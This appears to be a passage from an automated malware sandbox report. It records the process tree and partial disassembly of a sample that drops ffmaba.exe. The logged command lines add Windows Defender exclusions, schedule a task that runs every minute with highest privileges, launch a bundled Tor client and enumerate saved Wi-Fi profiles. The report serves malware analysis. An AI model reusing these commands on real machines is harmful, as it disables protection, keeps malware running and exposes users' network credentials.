                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:8
                                                                          Start time:09:46:41
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:9
                                                                          Start time:09:46:41
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:09:46:52
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\ffmaba.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\ffmaba.exe"
                                                                          Imagebase:0x3b0000
                                                                          File size:511'496 bytes
                                                                          MD5 hash:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 46%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:12
                                                                          Start time:09:46:53
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:13
                                                                          Start time:09:46:53
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:14
                                                                          Start time:09:46:53
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0x790000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:15
                                                                          Start time:09:46:53
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:16
                                                                          Start time:09:46:53
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\chcp.com
                                                                          Wow64 process (32bit):true
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x1f0000
                                                                          File size:12'800 bytes
                                                                          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:17
                                                                          Start time:09:46:54
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 3
                                                                          Imagebase:0xaa0000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:18
                                                                          Start time:09:46:57
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
                                                                          Imagebase:0x260000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:19
                                                                          Start time:09:46:57
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0xae0000
                                                                          File size:511'496 bytes
                                                                          MD5 hash:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 46%, ReversingLabs
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:20
                                                                          Start time:09:46:58
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:21
                                                                          Start time:09:46:58
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:22
                                                                          Start time:09:46:58
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Imagebase:0x680000
                                                                          File size:511'496 bytes
                                                                          MD5 hash:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:23
                                                                          Start time:09:47:00
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:24
                                                                          Start time:09:47:00
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:25
                                                                          Start time:09:47:08
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
                                                                          Imagebase:0xa0000
                                                                          File size:4'229'632 bytes
                                                                          MD5 hash:07244A2C002FFDF1986B454429EACE0B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 0%, ReversingLabs
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:26
                                                                          Start time:09:47:08
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:27
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                          Imagebase:0x790000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:28
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:29
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\chcp.com
                                                                          Wow64 process (32bit):true
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x1f0000
                                                                          File size:12'800 bytes
                                                                          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:30
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\netsh.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:netsh wlan show profiles
                                                                          Imagebase:0x1080000
                                                                          File size:82'432 bytes
                                                                          MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:31
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /R /C:"[ ]:[ ]"
                                                                          Imagebase:0x9e0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:32
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                          Imagebase:0x790000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:33
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:34
                                                                          Start time:09:47:11
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\chcp.com
                                                                          Wow64 process (32bit):true
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x1f0000
                                                                          File size:12'800 bytes
                                                                          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:35
                                                                          Start time:09:47:11
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\netsh.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:netsh wlan show networks mode=bssid
                                                                          Imagebase:0x1080000
                                                                          File size:82'432 bytes
                                                                          MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:36
                                                                          Start time:09:47:11
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr "SSID BSSID Signal"
                                                                          Imagebase:0x9e0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:39
                                                                          Start time:09:48:00
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Imagebase:0xb30000
                                                                          File size:511'496 bytes
                                                                          MD5 hash:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:40
                                                                          Start time:09:48:01
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:41
                                                                          Start time:09:48:01
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:42
                                                                          Start time:09:49:00
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Imagebase:0x270000
                                                                          File size:511'496 bytes
                                                                          MD5 hash:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:43
                                                                          Start time:09:49:02
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:44
                                                                          Start time:09:49:03
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff757150000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:45
                                                                          Start time:09:50:00
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Imagebase:0xa50000
                                                                          File size:511'496 bytes
                                                                          MD5 hash:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:46
                                                                          Start time:09:50:03
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:47
                                                                          Start time:09:50:03
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:7%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:34
                                                                            Total number of Limit Nodes:4
                                                                            execution_graph 14001 b5b740 14002 b5b754 14001->14002 14004 b5b779 14002->14004 14005 b5aeb0 14002->14005 14006 b5b920 LoadLibraryExW 14005->14006 14008 b5b999 14006->14008 14008->14004 14009 b5d740 14010 b5d786 GetCurrentProcess 14009->14010 14012 b5d7d1 14010->14012 14013 b5d7d8 GetCurrentThread 14010->14013 14012->14013 14014 b5d815 GetCurrentProcess 14013->14014 14015 b5d80e 14013->14015 14016 b5d84b GetCurrentThreadId 14014->14016 14015->14014 14018 b5d8a4 14016->14018 13997 b5b698 13998 b5b6e0 GetModuleHandleW 13997->13998 13999 b5b6da 13997->13999 14000 b5b70d 13998->14000 13999->13998 14019 b5d988 DuplicateHandle 14020 b5da1e 14019->14020 14021 b54668 14022 b54672 14021->14022 14024 b54759 14021->14024 14025 b5477d 14024->14025 14029 b54868 14025->14029 14033 b54858 14025->14033 14031 b5488f 14029->14031 14030 b5496c 14031->14030 14037 b544b4 14031->14037 14034 b5488f 14033->14034 14035 b5496c 14034->14035 14036 b544b4 CreateActCtxA 14034->14036 14035->14035 14036->14035 14038 b558f8 CreateActCtxA 14037->14038 14040 b559bb 14038->14040 14040->14040

                                                                            Executed Functions

                                                                            Function 00B5D740 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 295 b5d740-b5d7cf GetCurrentProcess 299 b5d7d1-b5d7d7 295->299 300 b5d7d8-b5d80c GetCurrentThread 295->300 299->300 301 b5d815-b5d849 GetCurrentProcess 300->301 302 b5d80e-b5d814 300->302 304 b5d852-b5d86a 301->304 305 b5d84b-b5d851 301->305 302->301 308 b5d873-b5d8a2 GetCurrentThreadId 304->308 305->304 309 b5d8a4-b5d8aa 308->309 310 b5d8ab-b5d90d 308->310 309->310
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 00B5D7BE
                                                                            • GetCurrentThread.KERNEL32 ref: 00B5D7FB
                                                                            • GetCurrentProcess.KERNEL32 ref: 00B5D838
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00B5D891
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: c4768d171e16667a2ded9634a2598b8519f9743a5e8063c437802e5af15e0446
                                                                            • Instruction ID: 7f9aaa0f9d7e80f3f29bd5aeae60ed58c0729a4c7e86d06af05131209a555b7b
                                                                            • Opcode Fuzzy Hash: c4768d171e16667a2ded9634a2598b8519f9743a5e8063c437802e5af15e0446
                                                                            • Instruction Fuzzy Hash: 895155B19002098FDB14CFA9D948B9EFBF1EF88318F248599E408A7360D774A948CF65
                                                                            Function 00B558EC Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 338 b558ec-b559b9 CreateActCtxA 340 b559c2-b55a1c 338->340 341 b559bb-b559c1 338->341 348 b55a1e-b55a21 340->348 349 b55a2b-b55a2f 340->349 341->340 348->349 350 b55a31-b55a3d 349->350 351 b55a40 349->351 350->351 352 b55a41 351->352 352->352
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00B559A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 4218c444169a9383edac6b2380d5482b9f7188ccd91d2515e36d373ad2fd6897
                                                                            • Instruction ID: 9f7ce928a3d4434fc460814de2dc2d9608a2f115e99af966ed9096f402ec8cc9
                                                                            • Opcode Fuzzy Hash: 4218c444169a9383edac6b2380d5482b9f7188ccd91d2515e36d373ad2fd6897
                                                                            • Instruction Fuzzy Hash: 9641CFB0C00719CEDB24DFA9C884BDEBBF6BF49305F24819AD409AB251DB756949CF60
                                                                            Function 00B544B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 354 b544b4-b559b9 CreateActCtxA 357 b559c2-b55a1c 354->357 358 b559bb-b559c1 354->358 365 b55a1e-b55a21 357->365 366 b55a2b-b55a2f 357->366 358->357 365->366 367 b55a31-b55a3d 366->367 368 b55a40 366->368 367->368 369 b55a41 368->369 369->369
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00B559A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 73d95cfa30dae57f3d8382bc6f4d3b329063cf0db953edc940774b90aee99c06
                                                                            • Instruction ID: 81587fe8b9aaf687a3ceba102add8fc93d2b2a57f9884b2e56af948c62fb9273
                                                                            • Opcode Fuzzy Hash: 73d95cfa30dae57f3d8382bc6f4d3b329063cf0db953edc940774b90aee99c06
                                                                            • Instruction Fuzzy Hash: D941B0B0C00719CBDB24DFA9C884B9EBBF5FF49305F2081AAD409AB251DB756949CF90
                                                                            Function 00B5D988 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 371 b5d988-b5da1c DuplicateHandle 372 b5da25-b5da42 371->372 373 b5da1e-b5da24 371->373 373->372
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5DA0F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 8d176b2e3e1c0677200a536907bd91876e17f664db27fbc9e0df8dd0a41ca8f4
                                                                            • Instruction ID: deb41646fecfda4847c4d12002db3aade169e3fda6b2de6f59d2d6b183c52115
                                                                            • Opcode Fuzzy Hash: 8d176b2e3e1c0677200a536907bd91876e17f664db27fbc9e0df8dd0a41ca8f4
                                                                            • Instruction Fuzzy Hash: 8021E4B5900209DFDB10CF9AD984ADEBBF8FB48310F14805AE914A3310D374A944CFA1
                                                                            Function 00B5AEB0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
